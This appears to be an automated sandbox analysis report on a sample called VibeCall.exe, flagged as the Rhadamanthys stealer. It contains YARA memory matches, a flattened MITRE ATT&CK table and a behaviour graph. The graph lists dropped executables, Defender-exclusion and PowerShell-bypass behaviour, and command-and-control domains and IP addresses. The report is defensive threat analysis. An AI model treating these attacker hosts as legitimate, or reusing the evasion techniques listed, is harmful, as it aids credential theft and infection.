                      Source: Yara matchFile source: 0000000F.00000003.2613199093.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.2622310523.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.2748731274.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.2762606436.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2771328207.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.2850833313.00000000045B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2675380696.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.2660565832.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2712038838.0000000003550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.2813182905.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2761245461.0000000003480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.2664105430.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2637203150.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts141
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		11
                      Process Injection                      		111
                      Masquerading                      		21
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services21
                      Input Capture                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      PowerShell                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		LSASS Memory251
                      Security Software Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)161
                      Virtualization/Sandbox Evasion                      		Security Account Manager1
                      Process Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive11
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection                      		NTDS161
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput Capture11
                      Ingress Tool Transfer                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeylogging3
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      System Network Configuration Discovery                      		VNCGUI Input Capture124
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSync144
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1626653 Sample: VibeCall.exe Startdate: 28/02/2025 Architecture: WINDOWS Score: 84 59 pastebin.com 2->59 61 rustaisolutionnorisk.com 2->61 63 3 other IPs or domains 2->63 81 Suricata IDS alerts for network traffic 2->81 83 Found malware configuration 2->83 85 Yara detected RHADAMANTHYS Stealer 2->85 89 5 other signatures 2->89 10 VibeCall.exe 17 2->10         started        signatures3 87 Connects to a pastebin service (likely for C&C) 59->87 process4 dnsIp5 75 ip-api.com 208.95.112.1 TUT-ASUS United States 10->75 77 147.45.60.20 FREE-NET-ASFREEnetEU Russian Federation 10->77 79 2 other IPs or domains 10->79 51 C:\Users\user\aisolution_vibecall_a.exe, PE32 10->51 dropped 53 C:\Users\...\videosolution_vibecall_b.exe, PE32 10->53 dropped 55 C:\Users\...\soundsolution_vibecall_c.exe, PE32 10->55 dropped 57 C:\Users\...\contry_solution_vibecall_e.exe, PE32 10->57 dropped 93 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->93 95 Bypasses PowerShell execution policy 10->95 97 Drops PE files to the user root directory 10->97 99 Adds a directory exclusion to Windows Defender 10->99 15 aisolution_vibecall_a.exe 1 10->15         started        18 soundsolution_vibecall_c.exe 1 10->18         started        20 contry_solution_vibecall_e.exe 10->20         started        22 4 other processes 10->22 file6 signatures7 process8 dnsIp9 101 Switches to a custom stack to bypass stack traces 15->101 25 fontdrvhost.exe 15->25         started        39 2 other processes 15->39 29 OpenWith.exe 18->29         started        31 WerFault.exe 18->31         started        33 fontdrvhost.exe 20->33         started        41 2 other processes 20->41 65 pastebin.com 104.20.4.235, 443, 49739 CLOUDFLARENETUS United States 22->65 103 Loading BitLocker PowerShell Module 22->103 35 conhost.exe 22->35         started        37 conhost.exe 22->37         started        43 2 other processes 22->43 signatures10 process11 dnsIp12 67 171.22.120.233 DEDIPATH-LLCUS Latvia 25->67 91 Switches to a custom stack to bypass stack traces 25->91 45 fontdrvhost.exe 25->45         started        69 98.142.253.232 VELCOMCA Canada 29->69 71 api.help-asus.com 79.141.162.188 HZ-US-ASBG Bulgaria 33->71 73 cloudflare-dns.com 104.16.248.249 CLOUDFLARENETUS United States 33->73 47 fontdrvhost.exe 33->47         started        signatures13 process14 process15 49 WerFault.exe 45->49         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.